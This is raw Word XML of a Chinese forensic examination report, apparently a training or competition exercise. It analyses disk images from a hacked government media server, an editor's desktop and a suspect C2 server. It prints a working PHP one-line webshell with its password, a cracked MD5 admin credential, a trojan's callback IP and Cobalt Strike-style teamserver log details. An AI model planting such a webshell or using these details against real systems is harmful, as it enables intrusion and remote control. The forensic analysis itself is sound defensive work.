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0" w:line="600" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:asci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ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:cs="方正小标宋简体"/>
          <w:b w:val="0"/>
          <w:bCs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279400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1464945" cy="1476375"/>
                <wp:effectExtent l="12700" t="12700" r="27305" b="158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362450" y="1466850"/>
                          <a:ext cx="1464945" cy="1476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mpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="C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5pt;margin-top:22pt;height:116.25pt;width:115.35pt;z-index:-251642880;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF" filled="t" stroked="t" coordsize="21600,21600" o:gfxdata="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Uu/ko2gAAAAoBAAAPAAAAAAAA&#10;AAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAYVruuEkCAACMBAAADgAA&#10;AAAAAAABACAAAAApAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAA5AUAAAAA&#10;">
                <v:path/>
                <v:fill on="t" focussize="0,0"/>
                <v:stroke weight="2pt" color="#C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spacing w:before="0" w:after="0" w:line="600" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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取证分析报告</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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简要案情：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 xml:space="preserve"> 经查，黑客先入侵了某政府媒体网站，并对局域网电脑进行了内网渗透，进入某大运会宣传主编的台式机内，并在该主编的台式机内上传了一段反党视频。警方通过现场取证已获得政府网站服务器镜像1份、主编台式机镜像1份，以及通过网络侦查调证获取疑似黑客使用的服务器镜像1份。现需对镜像文件进行检验分析，提取与固定涉案电子证据。</w:t>
      </w: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738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仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312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  <w:t xml:space="preserve"> 检查</w:t>
      </w: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</w:rPr>
        <w:t>对象：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</w:rPr>
        <w:t>名为的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>镜像压缩文件1个,名称：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</w:rPr>
        <w:t>“镜像1.zip”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>，大小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19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>GB。</w:t>
      </w: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  <w:t xml:space="preserve">        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          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738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none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>目的：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</w:rPr>
        <w:t>提取、固定与恢复本次案件的相关电子证据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>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>过程、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs>
        <w:ind w:firstLine="640" w:firstLineChars="200"/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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.本次电子证据检查过程采用的技术标准有：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szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>《GA-T 1170-2014移动终端取证检视方法》；《GB/T 29360-2012 电子物证数据恢复检验规程》；《GA/T 757-2008程序功能检验方法》</w:t>
      </w:r>
      <w:r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  <w:t>、《GB/T 29360-2012 电子物证数据恢复检验规程》、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  <w:t>《GB/T 29361-2012电子物证文件一致性检验规程》、《GB/T 29362-2012 电子物证数据搜索检验规程》、《GA/T 754-2008 电子数据存储介质复制工具要求及检测方法》、《GA/T 755-2008 电子数据存储介质写保护设备要求及检测方法》、《GA/T 756-2008 数字化设备证据数据发现提取固定方法》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                                                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs>
        <w:ind w:firstLine="640" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>、本次电子数据检查使用的设备有：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美亚柏科取证航母FL-2000、取证大师V6.2.01035RTM、弘连火眼证据分析软件V4.25.0.54499、电子数据仿真取证系统V6.2.03882RTM、VeraCrypt（1.25.7）、WinRAR 压缩管理软件（5.80）、微步云沙箱在线版、火绒杀毒软件（版本：5.0.73.6）、Hash（1.0.4）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</w:rPr>
        <w:t>。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                              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              </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs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3、打开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美亚柏科取证航母FL-2000，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>系统运行正常，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火绒杀毒软件（版本：5.0.73.6）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>对使用的工作站系统进行进行病毒扫描，未发现病毒。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   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs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4、使用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WinRAR 压缩管理软件（5.80）解压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</w:rPr>
        <w:t>镜像1.zip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>得到一个加密容器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。使用软件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Hash（1.0.4）对该加密容器进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>校检</w:t>
      </w:r>
      <w:r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  <w:t>，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得到MD5值为3A6DE3FE5D34259C6FC7D7F33340F7D6。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>详见图1</w:t>
      </w:r>
      <w:r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  <w:t>。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      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                                </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="50387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5、使用软件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VeraCrypt（1.25.7）加载该加密容器，得到三个镜像文件，分别为：受害人服务器.EO1、受害人台式机.E01、嫌疑人服务器.E01。详见图2。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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108585</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5269230" cy="1118235"/>
            <wp:effectExtent l="0" t="0" r="762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185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图2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6、打开电子数据仿真取证系统，点击添加镜像文件：受害人服务器.EO1，取消绕过密码，开始仿真镜像。进入受害人服务器后，打开护卫神控制面板，看到MySQL数据库启动失败，sqlserver未安装。在“管理工具”-“服务”中找到mysql服务，右键点击“属性”-“登录”-勾选“本地系统账户”。然后在护卫神控制面板重启mysql服务，并进入phpMyAdmin，在mynewcc123coom数据库的dede_member表中，找到admin账号以及一个名为“hacker”的账号。详见图3。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730875" cy="2098675"/>
            <wp:effectExtent l="0" t="0" r="3175" b="15875"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="5" name="图片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27"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect t="40103" r="5258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图3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7、根据mynewcc123coom数据库的dede_member表中记录的admin账号的密码3e6b1812df726be884ddcfc4139128db，将该密码进行MD5解密后得到管理员密码为admin7788。详见图4。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7380"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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100965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5267325" cy="1318895"/>
            <wp:effectExtent l="0" t="0" r="9525" b="14605"/>
            <wp:wrapTopAndBottom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图4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8、打开火眼证据分析软件，将受害人服务器.E01添加到检材当中，在文件系统中搜索“shell.php”,找到在C：HwsHostMaster\wwwroot\newcc123_sqlohp\web\uploads\allimg存在一个shell.php文件，打开该php文件，里面为一句话木马&lt;?php @eval($_POST['shell']);?&gt;，该木马连接密码为shell。详见图5、图6。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583565</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1385570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3888740" cy="395605"/>
            <wp:effectExtent l="0" t="0" r="16510" b="4445"/>
            <wp:wrapTopAndBottom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6358" t="50665" r="9418" b="18436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图5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28575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5503545" cy="941705"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10795"/>
            <wp:wrapTopAndBottom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b="16826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图6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2054225</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5267960" cy="2159000"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12700"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10" name="图片 5" descr="c16dc399db863d78bff4b541623c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c16dc399db863d78bff4b541623c95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9、用电子数据仿真取证系统添加镜像文件：受害人台式机.E01，开始仿真镜像。进入受害人电脑后，登录用户名为孙笑川，在电脑桌面上有个artifact.exe的文件，将该文件放到微步云沙箱进行分析得到该文件为木马文件。详见图7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图7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10、通过查看受害人台式机的windows日志，在2023年5月24日10点32分，账户名为“孙笑川”的用户新建一个名为“黄雪君$”的账户。详见图8。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图8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-44450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5269865" cy="4093210"/>
            <wp:effectExtent l="0" t="0" r="6985" b="2540"/>
            <wp:wrapTopAndBottom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11、通过微步云沙箱对木马文件artifact.exe进行分析，可以看到该木马其远程连接的IP为118.24.75.245。详见图9。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图9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57785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5266690" cy="1397000"/>
            <wp:effectExtent l="0" t="0" r="10160" b="12700"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="18" name="图片 6" descr="29f8b8d1136a98887e907c763f38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29f8b8d1136a98887e907c763f38d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12、通过搜索被害人电脑内的视频文件，发现在C盘根目录下有个1.avi文件，打开后就可以看到视频的链接地址为111.22.34.74:7002/console/login/LoginForm.jsp。详见图10。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图10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53975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5264150" cy="2240915"/>
            <wp:effectExtent l="0" t="0" r="12700" b="6985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2029460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5266055" cy="1430020"/>
            <wp:effectExtent l="0" t="0" r="10795" b="17780"/>
            <wp:wrapTopAndBottom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13、用电子数据仿真取证系统添加镜像文件：嫌疑人服务器.E01，该服务器为Linux系统，为方便操作，搭建宝塔Linux面板。通过宝塔面板找到/root/C2/logs/230524目录，查看目录文件中的日志文件events.log，可以看到视频文件的下载地址。详见图11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图11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14、进入嫌疑人服务器，通过指令进入到C2目录，通过teamserver命令连接到118.24.75.245，可以看到远控程序所在服务器的指纹。详见图13。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图13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51435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5272405" cy="414655"/>
            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
            <wp:wrapTopAndBottom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15、在宝塔Linux面板下，找到C2目录，打开该目录下的teamserver文件，可以找到远控程序的证书通用名称(Common Name)。详见图14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图14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24130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5273040" cy="845185"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12065"/>
            <wp:wrapTopAndBottom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3174365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4918710" cy="1600200"/>
            <wp:effectExtent l="0" t="0" r="15240" b="0"/>
            <wp:wrapTopAndBottom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rcRect t="5487" b="7424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16、在宝塔Linux面板下，进入到/root/C2/logs/230525/192.168.5.118，该目录下有一个beacon_2067070634.log日志文件，打开可以看到远控程序最后一次收到beacon的时间是05/25 06:14:48 UTC。因为服务器时间是UTC，在线时间戳转换器的时间为北京时间，所以要将服务器时间加8个小时在转换时间戳。通过时间戳转换器将该时间转换为时间戳：1684995288。详见图15、图16。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图15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93980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5269865" cy="1567180"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13970"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2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图16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17、在宝塔Linux面板下，进入到/root/C2/logs/230524目录下，发现该目录下除了被害人IP地址外，还存在另一个IP地址目录，为192.168.52.141，进入该目录后查看日志文件，可以看到该程序还远程控制过该IP。详见图17。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29210</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5266055" cy="1342390"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
            <wp:wrapTopAndBottom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图17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0MDQ0ZWY1YjI5YzVkMDE0MDBjZmYxOGEyYWU0MmYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="0000089F"/>
    <w:rsid w:val="001323B7"/>
    <w:rsid w:val="00136A84"/>
    <w:rsid w:val="00152E4A"/>
    <w:rsid w:val="00187221"/>
    <w:rsid w:val="00215046"/>
    <w:rsid w:val="00275E09"/>
    <w:rsid w:val="002C61B1"/>
    <w:rsid w:val="00395ECB"/>
    <w:rsid w:val="00402789"/>
    <w:rsid w:val="00414AFC"/>
    <w:rsid w:val="004D602C"/>
    <w:rsid w:val="005F3DD1"/>
    <w:rsid w:val="00714D41"/>
    <w:rsid w:val="00764ADD"/>
    <w:rsid w:val="00771540"/>
    <w:rsid w:val="007F3B55"/>
    <w:rsid w:val="0088574F"/>
    <w:rsid w:val="00885916"/>
    <w:rsid w:val="008B3B6E"/>
    <w:rsid w:val="009F7322"/>
    <w:rsid w:val="00A94FC9"/>
    <w:rsid w:val="00AD0E86"/>
    <w:rsid w:val="00B4621A"/>
    <w:rsid w:val="00BE04A5"/>
    <w:rsid w:val="00C57B43"/>
    <w:rsid w:val="00CF0A32"/>
    <w:rsid w:val="00CF2BE5"/>
    <w:rsid w:val="00D13D3E"/>
    <w:rsid w:val="00D21D35"/>
    <w:rsid w:val="00D26B26"/>
    <w:rsid w:val="00D47719"/>
    <w:rsid w:val="00E314BC"/>
    <w:rsid w:val="00E404C5"/>
    <w:rsid w:val="00EC43B0"/>
    <w:rsid w:val="00F126E2"/>
    <w:rsid w:val="00F46329"/>
    <w:rsid w:val="00FB2655"/>
    <w:rsid w:val="017A7DDF"/>
    <w:rsid w:val="041D6583"/>
    <w:rsid w:val="05CF2F65"/>
    <w:rsid w:val="0E78750E"/>
    <w:rsid w:val="10BD54DC"/>
    <w:rsid w:val="110178AF"/>
    <w:rsid w:val="16C551CE"/>
    <w:rsid w:val="19DC42B0"/>
    <w:rsid w:val="1CCE4A99"/>
    <w:rsid w:val="248B0CA0"/>
    <w:rsid w:val="25312D07"/>
    <w:rsid w:val="272E757C"/>
    <w:rsid w:val="283054FC"/>
    <w:rsid w:val="2D8B67FC"/>
    <w:rsid w:val="2DE8615C"/>
    <w:rsid w:val="2FBC49FC"/>
    <w:rsid w:val="308D5AED"/>
    <w:rsid w:val="336109DB"/>
    <w:rsid w:val="392063E5"/>
    <w:rsid w:val="392C50AB"/>
    <w:rsid w:val="3DFB3285"/>
    <w:rsid w:val="41126126"/>
    <w:rsid w:val="41320766"/>
    <w:rsid w:val="414B6A4C"/>
    <w:rsid w:val="41EA0AB7"/>
    <w:rsid w:val="4207047B"/>
    <w:rsid w:val="443C30FC"/>
    <w:rsid w:val="4515404B"/>
    <w:rsid w:val="45FA3D73"/>
    <w:rsid w:val="475308AF"/>
    <w:rsid w:val="480A29B7"/>
    <w:rsid w:val="492034BC"/>
    <w:rsid w:val="4CB73413"/>
    <w:rsid w:val="4DAF1346"/>
    <w:rsid w:val="4E2F6E59"/>
    <w:rsid w:val="4EFA40E2"/>
    <w:rsid w:val="4F6C17C9"/>
    <w:rsid w:val="4FA1519C"/>
    <w:rsid w:val="529076FB"/>
    <w:rsid w:val="53721611"/>
    <w:rsid w:val="548C355D"/>
    <w:rsid w:val="55F867B0"/>
    <w:rsid w:val="57093FE8"/>
    <w:rsid w:val="57A37617"/>
    <w:rsid w:val="60A1551D"/>
    <w:rsid w:val="65F2742C"/>
    <w:rsid w:val="684E1F30"/>
    <w:rsid w:val="69096D37"/>
    <w:rsid w:val="6A92228A"/>
    <w:rsid w:val="6BEA0017"/>
    <w:rsid w:val="6C5449B0"/>
    <w:rsid w:val="6C5A61CF"/>
    <w:rsid w:val="6D5D1E82"/>
    <w:rsid w:val="709D7CC0"/>
    <w:rsid w:val="73B42341"/>
    <w:rsid w:val="745854F2"/>
    <w:rsid w:val="770B4400"/>
    <w:rsid w:val="79F43E01"/>
    <w:rsid w:val="7A547DF7"/>
    <w:rsid w:val="7ADD118B"/>
    <w:rsid w:val="7B3C2F4A"/>
    <w:rsid w:val="7BB90A20"/>
    <w:rsid w:val="7BC963C3"/>
    <w:rsid w:val="7F782254"/>
    <w:rsid w:val="7FBD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2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8">
    <w:name w:val="page number"/>
    <w:qFormat/>
    <w:uiPriority w:val="0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2">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="7"/>
    <w:link w:val="5"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体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2063</Words>
  <Characters>3125</Characters>
  <Lines>32</Lines>
  <Paragraphs>9</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4041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2019-09-06T01:56:00Z</dcterms:created>
  <dc:creator>XLY</dc:creator>
  <cp:lastModifiedBy>欧米伽贝塔</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-09T08:09:03Z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F64D8A44365D4865BD124BD243FA8091</vt:lpwstr>
  </property>
</Properties>
</file>